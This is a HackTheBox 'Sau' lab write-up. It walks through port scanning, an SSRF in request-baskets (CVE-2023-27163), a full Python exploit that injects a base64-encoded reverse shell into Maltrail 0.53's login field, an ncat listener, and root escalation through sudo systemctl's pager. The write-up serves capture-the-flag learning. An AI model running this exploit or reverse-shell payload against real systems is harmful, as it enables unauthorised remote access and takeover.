HackTheBox: Sau

Table of Contents

[TOC]

Topic

Lab

HackTheBox:

https://app.hackthebox.com/machines/Sau

Initial Enumeration

●Start Machine:

Solution

1. nmap scan

nmap -sC -sV -T4 10.10.11.224

2. Browse http://10.10.11.224:55555/web

3. Create a new basket

http://10.10.11.224:55555/web/chwtest

4. Curl http://10.10.11.224:55555/web/chwtest

5.Attempt bucket response

5.1 Curl http://10.10.11.224:55555/web/chwtest

6. CVE 2023-27163

NATIONAL VULNERABILITY DATABASE

6.1 Attepmt curl

curl --location 'http://10.10.11.224:55555/api/baskets/chwtest2' --header 'Content-Type: application/json' --data '{"forward_url": "http://127.0.0.1:80/", "proxy_response": true, "insecure_tls": false, "expand_path": true, "capacity": 250}'

(web)

Powered by Mailtrail (v0.53) ● Hide threat ● Report false positive

7. Command Injection

Unauthenticated OS Command Injection in stamparm/maltrail

7.1 create exploit.py 

#!/bin/python3

import sys
import os
import base64

# Arguments to be passed
YOUR_IP = sys.argv[1]  # <your ip>
YOUR_PORT = sys.argv[2]  # <your port>
TARGET_URL = sys.argv[3]  # <target url>

print("\n[+]Started MailTrail version 0.53 Exploit")

# Fail-safe for arguments
if len(sys.argv) != 4:
    print("Usage: python3 mailtrail.py <your ip> <your port> <target url>")
    sys.exit(-1)


# Exploit the vulnerbility
def exploit(my_ip, my_port, target_url):
    # Defining python3 reverse shell payload
    payload = f'python3 -c \'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{my_ip}",{my_port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")\''
    # Encoding the payload with base64 encoding
    encoded_payload = base64.b64encode(payload.encode()).decode()
    # curl command that is to be executed on our system to exploit mailtrail
    command = f"curl '{target_url}/login' --data 'username=;`echo+\"{encoded_payload}\"+|+base64+-d+|+sh`'"
    # Executing it
    os.system(command)


print("\n[+]Exploiting MailTrail on {}".format(str(TARGET_URL)))
try:
    exploit(YOUR_IP, YOUR_PORT, TARGET_URL)
    print("\n[+] Successfully Exploited")
    print("\n[+] Check your Reverse Shell Listener")
except:
    print("\n[!] An Error has occured. Try again!")

7.2 Create ncat listening

ncat -nvlp

7.3 Execution exploit.py

python3 exploit.py 10.10.14.70 9876 http://10.10.11.224:55555/chwtest2

(ncat)

7.4 Find user flag

$id uid=1001(puma) gid=1001(puma) groups=1001(puma) $whami puma

$cd ~ cd ~ $ls user.txt

8. Get User Flag

user flag:

108552a4226f9a311*************

9. Privilege Escalation

ls -al

sudo -l

less interface

sudo systemctl status trail.service -(press RETURN)!/bin/sh !//bbiinn//sshh!/bin/sh

9.1 Check privilege & Find root flag

whoami

$cd ~ cd ~ $ls go root.txt

10. Get Root Flag

root flag:

d87bc7e22d1ea5b307************

tags: Web CTF ncat Privilege Escalation exploit.py